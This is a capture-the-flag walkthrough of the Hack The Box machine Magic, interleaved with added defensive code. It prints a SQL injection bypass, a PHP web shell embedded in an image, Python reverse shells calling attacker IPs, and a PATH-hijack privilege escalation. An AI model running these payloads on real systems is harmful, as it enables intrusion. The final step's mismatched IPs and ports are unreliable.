MAGIC — HACK THE BOX walkthrough

In this writeup I explain how I rooted the box Magic (IP address 10.10.10.185), which is rated medium difficulty.

[Screenshot: the landing page, with a "Please login to upload images" link in the left corner.]

Since the page says you must log in to upload images, I decided to look for a login bypass first and then for passwords.

Recon results:

nmap showed that ports 22 and 80 are open: Apache on port 80 and OpenSSH on port 22.

Login page

I tried logging in with default credentials such as admin:admin and admin:pass, but they all failed, so the next thing I tried was a SQL injection authentication bypass.

I bypassed the login page with simple SQL payloads:

username: ' OR 1=1 -- 
password: ' OR 1=1 -- 
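To show why that payload works and what stops it, here is an added example (not code from the box or from this writeup) with a constructed in-memory SQLite user table: the vulnerable login builds the WHERE clause by string concatenation, so the quote closes the literal and `-- ` comments out the password check; the hardened login binds the same inputs as parameters, so they are compared as plain values. The table, users and password are all made up for the demo.

```python
import sqlite3

# Constructed demo table (not the box's real schema). Passwords are stored in clear
# text only so the injection contrast stays visible; real apps store password hashes.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE login (username TEXT, password TEXT)")
    conn.execute("INSERT INTO login VALUES ('admin', 'Str0ngPassw0rd!')")
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """String concatenation: user input becomes part of the SQL statement itself."""
    query = ("SELECT username FROM login WHERE username = '" + username +
             "' AND password = '" + password + "'")
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_hardened(conn, username, password):
    """Bound parameters: the driver sends values separately from the statement text,
    so a quote or comment sequence in the input is just data to compare against."""
    row = conn.execute(
        "SELECT username FROM login WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


def detect_bypass(username_submitted, username_returned):
    """Detection hook: a successful login whose submitted username differs from the
    account actually returned is a strong sign the query was tampered with."""
    return username_returned is not None and username_submitted != username_returned


if __name__ == "__main__":
    db = make_db()
    payload = "' OR 1=1 -- "
    who = login_vulnerable(db, payload, payload)
    print("vulnerable login returned:", who, "| tampering:", detect_bypass(payload, who))
    print("hardened login returned:", login_hardened(db, payload, payload))
```

The same `detect_bypass` check is cheap to add to an application's login audit log: it fires only when the query returned an account the user never named.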

After bypassing the login page I was able to upload images.

The article linked above is useful for bypassing file upload restrictions. I tried uploading .php files with an image content type, but the upload only allowed files with a jpg or png extension.

The check can be bypassed with a double extension such as "image.php.png".

I used exiftool to embed the payload in the PNG's comment field:

exiftool -Comment='<?php system($_REQUEST["cmd"]); ?>' magic.png
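The upload check above failed because it trusted the client's filename. As an added example (not the box's code and not from this writeup), here is an upload validator the way I would write it: it only ever looks at the final extension, checks the file's magic bytes against that extension, rejects any image whose bytes contain a PHP open tag (metadata chunks included, which is where the exiftool comment ends up), and stores the file under a server-generated name so a client name like image.php.png can never reach disk as-is. The PNG bytes used for testing are constructed in the block; the function and variable names are my own.

```python
import re
import secrets
import struct
import zlib

PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
JPEG_MAGIC = b"\xff\xd8\xff"
# Allowed final extension -> magic bytes the content must start with.
ALLOWED = {"png": PNG_MAGIC, "jpg": JPEG_MAGIC, "jpeg": JPEG_MAGIC}
PHP_OPEN_TAG = re.compile(rb"<\?(php\b|=)", re.IGNORECASE)


def validate_upload(client_filename, data):
    """Return (accepted, reason), checking the name and the content separately."""
    name = client_filename.rsplit("/", 1)[-1].lower()
    if "." not in name:
        return False, "no extension"
    ext = name.rsplit(".", 1)[-1]  # only the final extension is ever considered
    if ext not in ALLOWED:
        return False, "extension not allowed: " + ext
    if not data.startswith(ALLOWED[ext]):
        return False, "content does not match declared type"
    # Defence in depth: a genuine PNG can still carry a script in a metadata chunk,
    # which matters if the web server ever hands the upload to a PHP handler.
    if PHP_OPEN_TAG.search(data):
        return False, "PHP open tag embedded in image data"
    return True, "ok"


def stored_name(client_filename):
    """Server-chosen name: the client controls neither the basename nor the extension,
    so image.php.png is stored as <random>.png and never matches a .php handler."""
    ext = client_filename.lower().rsplit(".", 1)[-1]
    return secrets.token_hex(16) + "." + ext


def _png_chunk(ctype, body):
    crc = zlib.crc32(ctype + body) & 0xFFFFFFFF
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)


def constructed_png(comment=None):
    """Constructed minimal PNG for testing (not an image from the box): signature,
    a 1x1 IHDR, an optional tEXt 'Comment' chunk like exiftool writes, and IEND."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)
    chunks = [_png_chunk(b"IHDR", ihdr)]
    if comment is not None:
        chunks.append(_png_chunk(b"tEXt", b"Comment\x00" + comment))
    chunks.append(_png_chunk(b"IEND", b""))
    return PNG_MAGIC + b"".join(chunks)


if __name__ == "__main__":
    tainted = constructed_png(b'<?php system($_REQUEST["cmd"]); ?>')
    print(validate_upload("image.php.png", constructed_png()), stored_name("image.php.png"))
    print(validate_upload("magic.png", tainted))
```

The server-generated name is the load-bearing control: even if the content checks were fooled, the stored file has exactly one extension from the allowlist, so Apache's handler mapping never sees ".php" in the path. The content checks are there so a bad handler configuration does not become an RCE on its own.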

UPLOADING PHP SHELL:

I uploaded the shell, and the file is accessible at http://10.10.10.185/images/uploads/image.php.png

So the final URL to execute a command becomes http://10.10.10.185/images/uploads/image.php.png?cmd=OS_command_here

[Screenshot: output of the id command, and the contents of /etc/passwd]

So now we have RCE; time to get a reverse shell.

I used this Python reverse shell from pentestmonkey:

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.168",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Now start a netcat listener on port 1234:

nc -nlvp 1234

established connection to magic hackthebox

Upgrade your shell:

python3 -c 'import pty;pty.spawn("/bin/bash")'

export TERM=xterm-256color

upgrading shell

I had already found one user, theseus, in /etc/passwd. After some simple manual enumeration I found a file named "db.php5" at /var/www/magic.

credentials from sql db

From it I got the database credentials: dbUsername: theseus, dbPassword: iamkingthesues

Getting the user flag:

Privilege escalation:

Here our user theseus has been given root privileges to run a command called sysinfo.

Let's look at the sysinfo command. When it is executed it calls four other commands to print hardware info, disk info, CPU info and memory usage. Among these, fdisk requires root privileges. sysinfo is a custom SUID binary owned by root, so whenever theseus executes it, it runs with root privileges.

So our privilege escalation vector is SUID binary exploitation: sysinfo calls fdisk by its bare name rather than by an absolute path, so whichever fdisk is found first on the caller's PATH runs as root.
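The defensive lesson of sysinfo is that a privileged helper must never let the caller's environment decide which program runs. As an added example (my own code, not the sysinfo binary and not from this writeup), the block below contrasts a PATH-dependent lookup with one pinned to a trusted directory list, shows a privileged runner that executes only absolute paths under a scrubbed environment, and includes a sandboxed demo that drops a harmless marker script named fdisk into a temporary directory placed first in PATH and reports which lookup is fooled. `TRUSTED_PATH` is an assumed value; adjust it to the host.

```python
import os
import shutil
import subprocess
import tempfile

# Assumed trusted directories; a real helper would hard-code the host's own set.
TRUSTED_PATH = "/usr/sbin:/usr/bin:/sbin:/bin"


def resolve_via_caller_path(cmd):
    """What system("fdisk -l") in a SUID binary effectively does: search the PATH
    inherited from whoever ran it."""
    return shutil.which(cmd)


def resolve_via_trusted_path(cmd):
    """Ignore the inherited PATH entirely and search only the fixed trusted list."""
    return shutil.which(cmd, path=TRUSTED_PATH)


def run_privileged_helper(argv):
    """Run a subcommand by absolute path with a scrubbed environment, which is how a
    root-owned helper should invoke its tools. Returns the CompletedProcess."""
    exe = resolve_via_trusted_path(argv[0])
    if exe is None:
        raise FileNotFoundError("not found in trusted PATH: " + argv[0])
    env = {"PATH": TRUSTED_PATH}  # nothing else from the caller's environment survives
    return subprocess.run([exe] + argv[1:], env=env, capture_output=True,
                          text=True, check=False)


def demo_shadowed_lookup(cmd="fdisk"):
    """Sandboxed demonstration: create a harmless marker script named `cmd` in a
    temporary directory, put that directory first in PATH, and return
    (caller_path_result, trusted_path_result, tmpdir). The marker is never executed
    and PATH is restored afterwards."""
    tmp = tempfile.mkdtemp()
    marker = os.path.join(tmp, cmd)
    with open(marker, "w") as f:
        f.write("#!/bin/sh\necho 'this is the marker, not the real tool'\n")
    os.chmod(marker, 0o755)
    old_path = os.environ.get("PATH", "")
    os.environ["PATH"] = tmp + os.pathsep + old_path
    try:
        via_caller = resolve_via_caller_path(cmd)
        via_trusted = resolve_via_trusted_path(cmd)
    finally:
        os.environ["PATH"] = old_path
        shutil.rmtree(tmp, ignore_errors=True)
    return via_caller, via_trusted, tmp


if __name__ == "__main__":
    caller, trusted, tmpdir = demo_shadowed_lookup()
    print("caller PATH resolved to :", caller)
    print("trusted PATH resolved to:", trusted)
```

When auditing a SUID binary, the question to ask is exactly the one `resolve_via_caller_path` answers: does any command it spawns get looked up through an environment the unprivileged caller controls? If so, the fix is the `run_privileged_helper` shape (absolute path plus a fixed environment), or dropping the SUID bit altogether.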

Creating a fdisk file containing our Python shell (on the attacking machine):

cat > fdisk <<'EOF'
#!/bin/bash
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.15.209",4442));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
EOF

wget 10.10.14.168/fdisk  # run this in the remote shell to download the file onto the target

Put this fdisk file in the /tmp directory and make it executable:

chmod 755 fdisk

Then I started a netcat listener on port 2234, executed sysinfo, and the magic happened: I got root access.

Rooted Magic.